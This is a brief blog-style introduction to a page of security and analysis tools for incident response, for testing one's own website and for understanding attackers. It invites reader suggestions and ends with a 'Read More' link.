The tools on this page can help you respond to an incident, test the security of your own website and better understand how attackers think and what tools they have available to them. As always I welcome your feedback in the comments and you are most welcome to suggest your own favorite security or analysis tools.

Read More